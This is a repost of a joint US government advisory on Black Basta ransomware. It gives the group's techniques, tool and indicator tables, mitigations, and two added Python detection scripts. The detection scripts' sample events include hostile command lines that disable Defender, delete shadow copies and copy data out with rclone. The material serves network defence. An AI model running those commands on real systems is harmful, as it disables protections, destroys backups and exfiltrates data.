US-Cert Alerts


#StopRansomware: Black Basta

Fri, 05/10/2024 - 9:02am
SUMMARY

Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Department of Health and Human Services (HHS), and Multi-State Information Sharing and Analysis Center (MS-ISAC) (hereafter referred to as the authoring organizations) are releasing this joint CSA to provide information on Black Basta, a ransomware variant whose actors have encrypted and stolen data from at least 12 out of 16 critical infrastructure sectors, including the Healthcare and Public Health (HPH) Sector.

This joint CSA provides TTPs and IOCs obtained from FBI investigations and third-party reporting. Black Basta is considered a ransomware-as-a-service (RaaS) variant and was first identified in April 2022. Black Basta affiliates have impacted a wide range of businesses and critical infrastructure in North America, Europe, and Australia. As of May 2024, Black Basta affiliates have impacted over 500 organizations globally.

Black Basta affiliates use common initial access techniques, such as phishing and exploiting known vulnerabilities, and then employ a double-extortion model, both encrypting systems and exfiltrating data. Ransom notes do not generally include an initial ransom demand or payment instructions. Instead, the notes provide victims with a unique code and instruct them to contact the ransomware group via a .onion URL (reachable through the Tor Browser). Typically, the ransom notes give victims between 10 and 12 days to pay the ransom before the ransomware group publishes their data on the Black Basta Tor site, Basta News.

Healthcare organizations are attractive targets for cybercrime actors due to their size, technological dependence, access to personal health information, and unique impacts from patient care disruptions. The authoring organizations urge HPH Sector and all critical infrastructure organizations to apply the recommendations in the Mitigations section of this CSA to reduce the likelihood of compromise from Black Basta and other ransomware attacks. Victims of ransomware should report the incident to their local FBI field office or CISA (see the Reporting section for contact information).

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 15. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Initial Access

Black Basta affiliates primarily use spearphishing [T1566] to obtain initial access. According to cybersecurity researchers, affiliates have also used Qakbot during initial access.[1]

Starting in February 2024, Black Basta affiliates began exploiting CVE-2024-1709 [CWE-288] [T1190], an authentication bypass in ConnectWise ScreenConnect. In some instances, affiliates have been observed abusing valid credentials [T1078].

Discovery and Execution

Black Basta affiliates use tools such as SoftPerfect network scanner (netscan.exe) to conduct network scanning. Cybersecurity researchers have observed affiliates conducting reconnaissance using utilities with innocuous file names such as Intel or Dell, left in the root drive C:\ [T1036].[1]

Lateral Movement

Black Basta affiliates use tools such as BITSAdmin and PsExec, along with Remote Desktop Protocol (RDP), for lateral movement. Some affiliates also use tools like Splashtop, ScreenConnect, and Cobalt Strike beacons to assist with remote access and lateral movement.

Privilege Escalation

Black Basta affiliates use credential scraping tools like Mimikatz for privilege escalation. According to cybersecurity researchers, Black Basta affiliates have also exploited ZeroLogon (CVE-2020-1472 [CWE-330]), NoPac (CVE-2021-42278 [CWE-20] and CVE-2021-42287 [CWE-269]), and PrintNightmare (CVE-2021-34527 [CWE-269]) for local and Active Directory domain privilege escalation [T1068].[1],[2]

Exfiltration and Encryption

Black Basta affiliates use RClone to facilitate data exfiltration prior to encryption. Before exfiltration, cybersecurity researchers have observed Black Basta affiliates using PowerShell [T1059.001] to disable antivirus products and, in some instances, deploying a tool called Backstab, designed to disable endpoint detection and response (EDR) tooling [T1562.001].[3] Once antivirus programs are terminated, the ransomware encrypts files with ChaCha20 and protects the encryption key with an embedded RSA-4096 public key, so only the holder of the matching private key can recover it [T1486]. A .basta or otherwise random file extension is added to file names, and a ransom note titled readme.txt is left on the compromised system.[4] To further inhibit system recovery, affiliates use vssadmin.exe to delete volume shadow copies [T1490].[5]
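
The intrusion chain walked through in the sections above (a masqueraded binary in the C:\ root, netscan, PsExec, PowerShell turning off Defender, rclone, vssadmin) expressed as process-creation detection logic. This is an added example, not code from the advisory or any of its authoring organizations: the event fields are a simplified stand-in for Sysmon Event ID 1 / Security 4688, every sample event is constructed, and the ATT&CK IDs beyond those the advisory maps (T1046, T1021.002, T1197, T1567.002) are my own mapping.

```python
"""
Added example, not code from the advisory or its authoring organizations:
map process-creation events to the Black Basta techniques described above.
The event fields (image, command_line) mimic Sysmon Event ID 1 / Security
4688 but are simplified, and every sample event is constructed.  ATT&CK IDs
not in the advisory's tables (T1046, T1021.002, T1197, T1567.002) are my own.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    host: str
    image: str          # full path of the new process
    command_line: str


@dataclass
class Detection:
    technique: str
    name: str
    host: str
    evidence: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _is_defender_disable(e: ProcessEvent) -> bool:
    return (_basename(e.image) in ("powershell.exe", "pwsh.exe")
            and re.search(r"set-mppreference\s.*-disable\w*", e.command_line, re.I) is not None)


def _is_rclone(e: ProcessEvent) -> bool:
    # A renamed rclone binary is still recognisable by its sub-command plus its own flags.
    cmd = e.command_line
    return (_basename(e.image) == "rclone.exe"
            or (re.search(r"\b(copy|sync|move)\b", cmd, re.I) is not None
                and re.search(r"--(transfers|config|checkers|bwlimit)\b", cmd, re.I) is not None))


# (ATT&CK ID, rule name, predicate) in the order the advisory walks the intrusion.
RULES = [
    ("T1036", "masqueraded binary (Intel*/Dell*) in C:\\ root",
     lambda e: re.fullmatch(r"c:\\(intel|dell)[^\\]*\.exe", e.image, re.I) is not None),
    ("T1046", "SoftPerfect network scanner",
     lambda e: _basename(e.image) == "netscan.exe"),
    ("T1021.002", "PsExec remote execution",
     lambda e: _basename(e.image) in ("psexec.exe", "psexec64.exe", "psexesvc.exe")),
    ("T1197", "BITSAdmin transfer",
     lambda e: _basename(e.image) == "bitsadmin.exe" and "/transfer" in e.command_line.lower()),
    ("T1562.001", "Defender disabled via PowerShell", _is_defender_disable),
    ("T1567.002", "rclone exfiltration to cloud storage", _is_rclone),
    ("T1490", "shadow copies deleted",
     lambda e: _basename(e.image) == "vssadmin.exe"
     and re.search(r"delete\s+shadows", e.command_line, re.I) is not None),
]


def detect(events):
    """Return one Detection per (event, matching rule), in event order."""
    hits = []
    for e in events:
        for technique, name, predicate in RULES:
            if predicate(e):
                hits.append(Detection(technique, name, e.host, e.command_line))
    return hits


# Constructed events resembling one intrusion across two hosts.
SAMPLE_EVENTS = [
    ProcessEvent("ws01", r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
    ProcessEvent("ws01", r"C:\Intel.exe", r"C:\Intel.exe"),
    ProcessEvent("ws01", r"C:\Users\Public\netscan.exe", "netscan.exe /hide /auto:C:\\Users\\Public\\r.xml"),
    ProcessEvent("ws01", r"C:\Tools\PsExec.exe", r"PsExec.exe \\srv03 -s -d cmd.exe /c whoami"),
    ProcessEvent("srv03", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell.exe -nop -c "Set-MpPreference -DisableRealtimeMonitoring $true"'),
    ProcessEvent("srv03", r"C:\Users\Public\svchost.exe",
                 "svchost.exe copy D:\\Finance mega:backup --transfers 16 --config C:\\Users\\Public\\r.conf"),
    ProcessEvent("srv03", r"C:\Windows\System32\vssadmin.exe", "vssadmin.exe delete shadows /all /quiet"),
]

if __name__ == "__main__":
    for d in detect(SAMPLE_EVENTS):
        print(f"{d.technique:<10} {d.host:<6} {d.name}: {d.evidence}")
```

The rclone rule deliberately keys on the sub-command and rclone-specific flags rather than the file name, since the affiliates rename tools; the same idea applies to the renamed svchost.exe in C:\Users\Public in the sample.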

Leveraged Tools

See Table 1 for publicly available tools and applications used by Black Basta affiliates. This includes legitimate tools repurposed for their operations.

Disclaimer: Use of these tools and applications should not be attributed as malicious without analytical evidence to support threat actor use and/or control.

Table 1: Tools Used by Black Basta Affiliates

  • BITSAdmin: A command-line utility that manages downloads/uploads between a client and server by using the Background Intelligent Transfer Service (BITS) to perform asynchronous file transfers.
  • Cobalt Strike: A penetration testing tool used by security professionals to test the security of networks and systems. Black Basta affiliates have used it to assist with lateral movement and file execution.
  • Mimikatz: A tool that allows users to view and save authentication credentials such as Kerberos tickets. Black Basta affiliates have used it to aid in privilege escalation.
  • PsExec: A tool designed to run programs and execute commands on remote systems.
  • PowerShell: A cross-platform task automation solution made up of a command-line shell, a scripting language, and a configuration management framework, which runs on Windows, Linux, and macOS.
  • RClone: A command line program used to sync files with cloud storage services such as Mega.
  • SoftPerfect Network Scanner (netscan.exe): Used to ping computers, scan ports, discover shared folders, and retrieve information about network devices via Windows Management Instrumentation (WMI), Simple Network Management Protocol (SNMP), HTTP, Secure Shell (SSH), and PowerShell. It also scans for remote services, registry, files, and performance counters.
  • ScreenConnect: Remote support, access, and meeting software that allows users to control devices remotely over the internet.
  • Splashtop: Remote desktop software that allows remote access to devices for support, access, and collaboration.
  • WinSCP: Windows Secure Copy is a free and open source SSH File Transfer Protocol, File Transfer Protocol, WebDAV, Amazon S3, and secure copy protocol client. Black Basta affiliates have used it to transfer data from a compromised network to actor-controlled accounts.

MITRE ATT&CK TACTICS AND TECHNIQUES

See Tables 2–6 for all referenced threat actor tactics and techniques in this advisory.

Table 2: Black Basta ATT&CK Techniques for Initial Access

  • Phishing (T1566): Black Basta affiliates have used spearphishing emails to obtain initial access.
  • Exploit Public-Facing Application (T1190): Black Basta affiliates have exploited ConnectWise vulnerability CVE-2024-1709 to obtain initial access.

Table 3: Black Basta ATT&CK Techniques for Privilege Escalation

  • Exploitation for Privilege Escalation (T1068): Black Basta affiliates have exploited the Zerologon, NoPac, and PrintNightmare vulnerabilities, and have used credential scraping tools like Mimikatz, for privilege escalation.

Table 4: Black Basta ATT&CK Techniques for Defense Evasion

  • Masquerading (T1036): Black Basta affiliates have conducted reconnaissance using utilities with innocuous file names, such as Intel or Dell, to evade detection.
  • Impair Defenses: Disable or Modify Tools (T1562.001): Black Basta affiliates have deployed a tool called Backstab to disable endpoint detection and response (EDR) tooling, and have used PowerShell to disable antivirus products.

Table 5: Black Basta ATT&CK Techniques for Execution

  • Command and Scripting Interpreter: PowerShell (T1059.001): Black Basta affiliates have used PowerShell to disable antivirus products.

Table 6: Black Basta ATT&CK Techniques for Impact

  • Inhibit System Recovery (T1490): Black Basta affiliates have used the vssadmin.exe program to delete volume shadow copies.
  • Data Encrypted for Impact (T1486): Black Basta affiliates have used ChaCha20 with an RSA-4096 public key to fully encrypt files.

INDICATORS OF COMPROMISE

See Table 7 for IOCs obtained from FBI investigations.

Table 7: Malicious Files Associated with Black Basta Ransomware (SHA-256 hash, file description)

  0112e3b20872760dda5f658f6b546c85f126e803e27f0577b294f335ffa5a298  rclone.exe
  d3683beca3a40574e5fd68d30451137e4a8bbaca8c428ebb781d565d6a70385e  Winscp.exe
  88c8b472108e0d79d16a1634499c1b45048a10a38ee799054414613cc9dccccc  DLL
  58ddbea084ce18cfb3439219ebcf2fc5c1605d2f6271610b1c7af77b8d0484bd  DLL
  39939eacfbc20a2607064994497e3e886c90cd97b25926478434f46c95bd8ead  DLL
  5b2178c7a0fd69ab00cef041f446e04098bbb397946eda3f6755f9d94d53c221  DLL
  51eb749d6cbd08baf9d43c2f83abd9d4d86eb5206f62ba43b768251a98ce9d3e  DLL
  d15bfbc181aac8ce9faa05c2063ef4695c09b718596f43edc81ca02ef03110d1  DLL
  5942143614d8ed34567ea472c2b819777edd25c00b3e1b13b1ae98d7f9e28d43  DLL
  05ebae760340fe44362ab7c8f70b2d89d6c9ba9b9ee8a9f747b2f19d326c3431  DLL
  a7b36482ba5bca7a143a795074c432ed627d6afa5bc64de97fa660faa852f1a6  DLL
  86a4dd6be867846b251460d2a0874e6413589878d27f2c4482b54cec134cc737  DLL
  07117c02a09410f47a326b52c7f17407e63ba5e6ff97277446efc75b862d2799  DLL
  96339a7e87ffce6ced247feb9b4cb7c05b83ca315976a9522155bad726b8e5be  ELF
  1c1b2d7f790750d60a14bd661dae5c5565f00c6ca7d03d062adcecda807e1779  ELF
  360c9c8f0a62010d455f35588ef27817ad35c715a5f291e43449ce6cb1986b98  ELF
  0554eb2ffa3582b000d558b6950ec60e876f1259c41acff2eac47ab78a53e94a  EXE
  9a55f55886285eef7ffabdd55c0232d1458175b1d868c03d3e304ce7d98980bc  EXE
  62e63388953bb30669b403867a3ac2c8130332cf78133f7fd4a7f23cdc939087  EXE
  7ad4324ea241782ea859af12094f89f9a182236542627e95b6416c8fb9757c59  EXE
  350ba7fca67721c74385faff083914ecdd66ef107a765dfb7ac08b38d5c9c0bd  EXE
  90ba27750a04d1308115fa6a90f36503398a8f528c974c5adc07ae8a6cd630e7  EXE
  fafaff3d665b26b5c057e64b4238980589deb0dff0501497ac50be1bc91b3e08  EXE
  acb60f0dd19a9a26aaaefd3326db8c28f546b6b0182ed2dcc23170bcb0af6d8f  EXE
  d73f6e240766ddd6c3c16eff8db50794ab8ab95c6a616d4ab2bc96780f13464d  EXE
  f039eaaced72618eaba699d2985f9e10d252ac5fe85d609c217b45bc8c3614f4  EXE
  723d1cf3d74fb3ce95a77ed9dff257a78c8af8e67a82963230dd073781074224  EXE
  ae7c868713e1d02b4db60128c651eb1e3f6a33c02544cc4cb57c3aa6c6581b6e  EXE
  fff35c2da67eef6f1a10c585b427ac32e7f06f4e4460542207abcd62264e435f  EXE
  df5b004be71717362e6b1ad22072f9ee4113b95b5d78c496a90857977a9fb415  EXE
  462bbb8fd7be98129aa73efa91e2d88fa9cafc7b47431b8227d1957f5d0c8ba7  EXE
  3c50f6369f0938f42d47db29a1f398e754acb2a8d96fd4b366246ac2ccbe250a  EXE
  5d2204f3a20e163120f52a2e3595db19890050b2faa96c6cba6b094b0a52b0aa  EXE
  37a5cd265f7f555f2fe320a68d70553b7aa9601981212921d1ac2c114e662004  EXE
  3090a37e591554d7406107df87b3dc21bda059df0bc66244e8abef6a5678af35  EXE
  17879ed48c2a2e324d4f5175112f51b75f4a8ab100b8833c82e6ddb7cd817f20  EXE
  42f05f5d4a2617b7ae0bc601dd6c053bf974f9a337a8fcc51f9338b108811b78  EXE
  882019d1024778e13841db975d5e60aaae1482fcf86ba669e819a68ce980d7d3  EXE
  e28188e516db1bda9015c30de59a2e91996b67c2e2b44989a6b0f562577fd757  EXE
  0a8297b274aeab986d6336b395b39b3af1bb00464cf5735d1ecdb506fef9098e  EXE
  69192821f8ce4561cf9c9cb494a133584179116cb2e7409bea3e18901a1ca944  EXE
  3337a7a9ccdd06acdd6e3cf4af40d871172d0a0e96fc48787b574ac93689622a  EXE
  17205c43189c22dfcb278f5cc45c2562f622b0b6280dcd43cc1d3c274095eb90  EXE
  b32daf27aa392d26bdf5faafbaae6b21cd6c918d461ff59f548a73d447a96dd9  EXE

See Tables 8–11 for IOCs obtained from trusted third-party reporting.

Disclaimer: The authoring organizations recommend network defenders investigate or vet IP addresses prior to taking action, such as blocking, as many cyber actors are known to change IP addresses, sometimes daily, and some IP addresses may host valid domains.
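
Before the indicators in Tables 7 through 11 can be used in a matcher they need refanging, and the disclaimer above is a reason to treat IP hits differently from domain and hash hits. The following is an added example, not code from the advisory or its authoring organizations: it refangs a handful of indicators copied from Tables 7, 8 and 10, matches the domain and all of its subdomains (Table 8 lists long generated hostnames under the same domains), and scans constructed log lines in an assumed format (timestamp, host, record kind, details).

```python
"""
Added example, not code from the advisory: refang the indicators published in
the IOC tables and match them against log lines.  The two hashes, three domains
and two IPs are copied from Tables 7, 8 and 10; the log format (timestamp, host,
record kind, details) and every log line are constructed for this example.
"""
import re
from dataclasses import dataclass

# Copied verbatim from the advisory, still defanged.
IOC_HASHES = {
    "0112e3b20872760dda5f658f6b546c85f126e803e27f0577b294f335ffa5a298": "rclone.exe (Table 7)",
    "d3683beca3a40574e5fd68d30451137e4a8bbaca8c428ebb781d565d6a70385e": "Winscp.exe (Table 7)",
}
IOC_DOMAINS = ["realbumblebee[.]net", ".rasapool[.]net", "trailshop[.]net"]  # Tables 8 and 10
IOC_IPS = ["66.249.66[.]18", "72.14.196[.]50"]                                # Table 8


def refang(indicator: str) -> str:
    """Undo [.] / [:] / hxxp defanging; a leading '.' in the tables means 'any subdomain'."""
    value = indicator.strip().replace("[.]", ".").replace("[:]", ":")
    value = re.sub(r"^hxxp(s?)://", r"http\1://", value, flags=re.I)
    return value.lstrip(".").lower()


def domain_matches(qname: str, ioc_domain: str) -> bool:
    """True for the domain itself and for any subdomain of it."""
    qname = qname.lower().rstrip(".")
    return qname == ioc_domain or qname.endswith("." + ioc_domain)


@dataclass
class Hit:
    kind: str         # domain | sha256 | ip
    indicator: str
    confidence: str
    line: str


LINE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) (?P<kind>dns|file|conn) (?P<rest>.+)$")


def scan(lines):
    domains = [refang(d) for d in IOC_DOMAINS]
    ips = {refang(i) for i in IOC_IPS}
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        kind, rest = m["kind"], m["rest"]
        if kind == "dns":                      # dns <qname> <qtype>
            qname = rest.split()[0]
            hits += [Hit("domain", d, "high", line) for d in domains if domain_matches(qname, d)]
        elif kind == "file":                   # file <path> <sha256>
            digest = rest.split()[-1].lower()
            if digest in IOC_HASHES:
                hits.append(Hit("sha256", IOC_HASHES[digest], "high", line))
        elif kind == "conn":                   # conn <src> -> <dst>:<port>
            dst = rest.split()[-1].rsplit(":", 1)[0]
            if dst in ips:
                # Per the advisory's disclaimer: IPs change and may host legitimate sites, so vet first.
                hits.append(Hit("ip", dst, "verify-before-blocking", line))
    return hits


# Constructed log lines; the first qname is a Table 8 host, the digest is Table 7's rclone.exe.
SAMPLE_LOG = [
    "2024-05-08T06:40:12Z ws01 dns my.2a91c002002.588027fa.dns.realbumblebee.net A",
    "2024-05-08T06:41:03Z ws01 dns www.example.com A",
    "2024-05-08T06:41:30Z ws01 dns cdn.rasapool.net A",
    r"2024-05-08T06:45:00Z srv02 file C:\Users\Public\rclone.exe 0112E3B20872760DDA5F658F6B546C85F126E803E27F0577B294F335FFA5A298",
    "2024-05-08T06:46:10Z srv02 conn 10.0.0.5 -> 72.14.196.50:443",
    "2024-05-08T06:47:00Z srv02 conn 10.0.0.5 -> 198.51.100.7:443",
]

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f"[{h.confidence}] {h.kind}={h.indicator}: {h.line}")
```

Hashes are lower-cased before lookup because EDR products differ in case; the uppercase digest in the sample line still matches. A blocklist built from this output should take the "high" hits as-is and route the IP hits through the vetting the disclaimer asks for.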

Table 8: Network Indicators (IP address, associated domains or role as published; rows with no description list only the IP)

  66.249.66[.]18  0gpw.588027fa.dns.realbumblebee[.]net, dns.trailshop[.]net, dns.artspathgroupe[.]net
  66.249.66[.]18  my.2a91c002002.588027fa.dns.realbumblebee[.]net
  66.249.66[.]18  fy9.39d9030e5d3a8e2352daae2f4cd3c417b36f64c6644a783b9629147a1.afd8b8a4615358e0313bad8c544a1af0d8efcec0e8056c2c8eee96c7.b06d1825c0247387e38851b06be0272b0bd619b7c9636bc17b09aa70.a46890f27.588027fa.dns.realbumblebee[.]net
  95.181.173[.]227  adslsdfdsfmo[.]world
  (IP not listed)  fy9.36c44903529fa273afff3c9b7ef323432e223d22ae1d625c4a3957d57.015c16eff32356bf566c4fd3590c6ff9b2f6e8c587444ecbfc4bcae7.f71995aff9e6f22f8daffe9d2ad9050abc928b8f93bb0d42682fd3c3.445de2118.588027fa.dns.realbumblebee[.]net
  207.126.152[.]242  xkpal.d6597fa.dns.blocktoday[.]net, nuher.3577125d2a75f6a277fc5714ff536c5c6af5283d928a66daad6825b9a.7aaf8bba88534e88ec89251c57b01b322c7f52c7f1a5338930ae2a50.cbb47411f60fe58f76cf79d300c03bdecfb9e83379f59d80b8494951.e10c20f77.7fcc0eb6.dns.blocktoday[.]net
  72.14.196[.]50  .rasapool[.]net, dns.trailshop[.]net
  72.14.196[.]192  .rasapool[.]net
  72.14.196[.]2  .rasapool[.]net
  72.14.196[.]226  .rasapool[.]net
  46.161.27[.]151
  207.126.152[.]242  nuher.1d67bbcf4.456d87aa6.2d84dfba.dns.specialdrills[.]com
  185.219.221[.]136
  64.176.219[.]106
  5.78.115[.]67  your-server[.]de
  207.126.152[.]242  xkpal.1a4a64b6.dns.blocktoday[.]net
  46.8.16[.]77
  185.7.214[.]79  VPN Server
  185.220.100[.]240  Tor exit
  107.189.30[.]69  Tor exit
  5.183.130[.]92
  185.220.101[.]149  Tor exit
  188.130.218[.]39
  188.130.137[.]181
  46.8.10[.]134
  155.138.246[.]122
  80.239.207[.]200  winklen[.]ch
  183.181.86[.]147  Xserver[.]jp
  34.149.120[.]3
  104.21.40[.]72
  34.250.161[.]149
  88.198.198[.]90  your-server[.]de; literoved[.]ru
  151.101.130[.]159
  35.244.153[.]44
  35.212.86[.]55
  34.251.163[.]236
  34.160.81[.]203
  34.149.36[.]179
  104.21.26[.]145
  83.243.40[.]10
  35.227.194[.]51
  35.190.31[.]54
  34.120.190[.]48
  116.203.186[.]178
  34.160.17[.]71

Table 9: File Indicators (path, hash where published; hashes are SHA-256 except the three 32-character values, which are published as-is)

  C:\Users\Public\Audio\Jun.exe  b6a4f4097367d9c124f51154d8750ea036a812d5badde0baf9c5f183bb53dd24
  C:\Users\Public\Audio\esx.zip
  C:\Users\Public\Audio\7zG.exe  f21240e0bf9f0a391d514e34d4fa24ecb997d939379d2260ebce7c693e55f061
  C:\Users\Public\Audio\7z.dll
  C:\Users\Public\db_Usr.sql  8501e14ee6ee142122746333b936c9ab0fc541328f37b5612b6804e6cdc2c2c6
  C:\Users\Public\Audio\db_Usr.sql
  C:\Users\Public\Audio\hv2.ps1
  C:\Users\Public\7zG.exe
  C:\Users\Public\7z.dll
  C:\Users\Public\BitLogic.dll
  C:\Users\Public\NetApp.exe  4c897334e6391e7a2fa3cbcbf773d5a4
  C:\Users\Public\DataSoft.exe  2642ec377c0cee3235571832cb472870
  C:\Users\Public\BitData.exe  b3fe23dd4701ed00d79c03043b0b952e
  C:\Users\Public\DigitalText.dll
  C:\Users\Public\GeniusMesh.exe
  \Device\Mup\{redacted}\C$\Users\Public\Music\PROCEXP.sys
  \Device\Mup\{redacted}\C$\Users\Public\Music\DumpNParse86.exe
  \Device\Mup\{redacted}\C$\Users\Public\Music\POSTDump.exe
  \Device\Mup\{redacted}\C$\Users\Public\Music\DumpNParse.exe
  C:\Users\Public\socksps.ps1
  C:\Users\Public\Thief.exe  034b5fe047920b2ae9493451623633b14a85176f5eea0c7aadc110ea1730ee79
  C:\Users\All Users\{redacted}\GWT.ps1 and C:\Program Files\MonitorIT\GWT.ps1  8C68B2A794BA3D148CAE91BDF9C8D357289752A94118B5558418A36D95A5A45F
  Winx86.exe (comment: alias for cmd.exe)
  C:\Users\Public\eucr.exe  3c65da7f7bfdaf9acc6445abbedd9c4e927d37bb9e3629f34afc338058680407
  C:\Windows\DS_c1.dll  808c96cb90b7de7792a827c6946ff48123802959635a23bf9d98478ae6a259f9
  C:\Windows\DS_c1.dll  3a8fc07cadc08eeb8be342452636a754158403c3d4ebff379a4ae66f8298d9a6
  C:\Windows\DS_c1.dll  4ac69411ed124da06ad66ee8bfbcea2f593b5b199a2c38496e1ee24f9d04f34a
  C:\Windows\DS_c1.dll  819cb9bcf62be7666db5666a693524070b0df589c58309b067191b30480b0c3a
  C:\Windows\DS_c1.dll  c26a5cb62a78c467cc6b6867c7093fbb7b1a96d92121d4d6c3f0557ef9c881e0
  C:\Windows\DS_c1.dll  d503090431fdd99c9df3451d9b73c5737c79eda6eb80c148b8dc71e84623401f
  *\instructions_read_me.txt

Table 10: Known Black Basta Cobalt Strike Domains (domain, date/time observed, UTC)

  trailshop[.]net  5/8/2024 6:37
  realbumblebee[.]net  5/8/2024 6:37
  recentbee[.]net  5/8/2024 6:37
  investrealtydom[.]net  5/8/2024 6:37
  webnubee[.]com  5/8/2024 6:37
  artspathgroup[.]net  5/8/2024 6:37
  buyblocknow[.]com  5/8/2024 6:37
  currentbee[.]net  5/8/2024 6:37
  modernbeem[.]net  5/8/2024 6:37
  startupbusiness24[.]net  5/8/2024 6:37
  magentoengineers[.]com  5/8/2024 6:37
  childrensdolls[.]com  5/8/2024 6:37
  myfinancialexperts[.]com  5/8/2024 6:37
  limitedtoday[.]com  5/8/2024 6:37
  kekeoamigo[.]com  5/8/2024 6:37
  nebraska-lawyers[.]com  5/8/2024 6:37
  tomlawcenter[.]com  5/8/2024 6:37
  thesmartcloudusa[.]com  5/8/2024 6:37
  rasapool[.]net  5/8/2024 6:37
  artspathgroupe[.]net  5/8/2024 6:37
  specialdrills[.]com  5/8/2024 6:37
  thetrailbig[.]net  5/8/2024 6:37
  consulheartinc[.]com  3/22/2024 15:35
  otxcosmeticscare[.]com  3/15/2024 10:14
  otxcarecosmetics[.]com  3/15/2024 10:14
  artstrailman[.]com  3/15/2024 10:14
  ontexcare[.]com  3/15/2024 10:14
  trackgroup[.]net  3/15/2024 10:14
  businessprofessionalllc[.]com  3/15/2024 10:14
  securecloudmanage[.]com  3/7/2024 10:42
  oneblackwood[.]com  3/7/2024 10:42
  buygreenstudio[.]com  3/7/2024 10:42
  startupbuss[.]com  3/7/2024 10:42
  onedogsclub[.]com  3/4/2024 18:26
  wipresolutions[.]com  3/4/2024 18:26
  recentbeelive[.]com  3/4/2024 18:26
  trailcocompany[.]com  3/4/2024 18:26
  trailcosolutions[.]com  3/4/2024 18:26
  artstrailreviews[.]com  3/4/2024 18:26
  usaglobalnews[.]com  2/15/2024 5:56
  topglobaltv[.]com  2/15/2024 5:56
  startupmartec[.]net  2/15/2024 5:56
  technologgies[.]com  1/2/2024 18:16
  jenshol[.]com  1/2/2024 18:16
  simorten[.]com  1/2/2024 18:16
  investmentgblog[.]net  1/2/2024 18:16
  protectionek[.]com  1/2/2024 18:16

Table 11: Suspected Black Basta Domains

  airbusco[.]net
  allcompanycenter[.]com
  animalsfast[.]net
  audsystemecll[.]net
  auuditoe[.]com
  bluenetworking[.]net
  brendonline[.]com
  businesforhome[.]com
  caspercan[.]com
  clearsystemwo[.]net
  cloudworldst[.]net
  constrtionfirst[.]com
  erihudeg[.]com
  garbagemoval[.]com
  gartenlofti[.]com
  getfnewsolutions[.]com
  getfnewssolutions[.]com
  investmendvisor[.]net
  investmentrealtyhp[.]net
  ionoslaba[.]com
  jessvisser[.]com
  karmafisker[.]com
  kolinileas[.]com
  maluisepaul[.]com
  masterunix[.]net
  monitor-websystem[.]net
  monitorsystem[.]net
  mytrailinvest[.]net
  prettyanimals[.]net
  reelsysmoona[.]net
  seohomee[.]com
  septcntr[.]com
  softradar[.]net
  startupbizaud[.]net
  startuptechnologyw[.]net
  steamteamdev[.]net
  stockinvestlab[.]net
  taskthebox[.]net
  trailgroupl[.]net
  treeauwin[.]net
  unitedfrom[.]com
  unougn[.]com
  wardeli[.]com
  welausystem[.]net
  wellsystemte[.]net
  withclier[.]com

MITIGATIONS

The authoring organizations recommend all critical infrastructure organizations implement the mitigations below to improve your organization’s cybersecurity posture based on Black Basta’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

The authoring organizations also recommend network defenders of HPH Sector and other critical infrastructure organizations to reference CISA’s Mitigation Guide: Healthcare and Public Health (HPH) Sector and HHS’s HPH Cybersecurity Performance Goals, which provide best practices to combat pervasive cyber threats against organizations. Recommendations include the following:

  • Asset Management and Security: Cybersecurity professionals should identify and understand all relationships or interdependencies, functionality of each asset, what it exposes, and what software is running to ensure critical data and systems are protected appropriately. HPH Sector organizations should ensure electronic PHI (ePHI) is protected and compliant with the Health Insurance Portability and Accountability Act (HIPAA). Organizations can complete asset inventories using active scans, passive processes, or a combination of both techniques.
  • Email Security and Phishing Prevention: Organizations should install modern anti-malware software and automatically update signatures where possible. For additional guidance, see CISA’s Enhance Email and Web Security Guide.
    • Check for embedded or spoofed hyperlinks: Validate the URL of the link matches the text of the link itself. This can be achieved by hovering your cursor over the link to view the URL of the website to be accessed.
  • Access Management: Phishing-resistant MFA removes the user-handled factor (a one-time code or a push approval) that social engineering and targeted phishing turn against traditional MFA, so a login captured on a lookalike site cannot be replayed. The two main forms of phishing-resistant MFA are FIDO/Web Authentication (WebAuthn) authentication and Public Key Infrastructure (PKI)-based authentication. Prioritize phishing-resistant MFA on accounts with the highest risk, such as privileged administrative accounts on key assets. For additional information on phishing-resistant MFA, see CISA’s Implementing Phishing-Resistant MFA Guide.
  • Vulnerability Management and Assessment: Once vulnerabilities are identified across your environment, evaluate and prioritize to appropriately deal with the posed risks according to your organization’s risk strategy. To assist with prioritization, it is essential to:
    • Map your assets to business-critical functions. For vulnerability remediation, prioritize assets that are most critical for ongoing operations or which, if affected, could impact your organization’s business continuity, sensitive PII (or PHI) security, reputation, or financial position.
    • Use threat intelligence information. For remediation, prioritize vulnerabilities actively exploited by threat actors. To assist, leverage CISA’s KEV Catalog and other threat intelligence feeds.
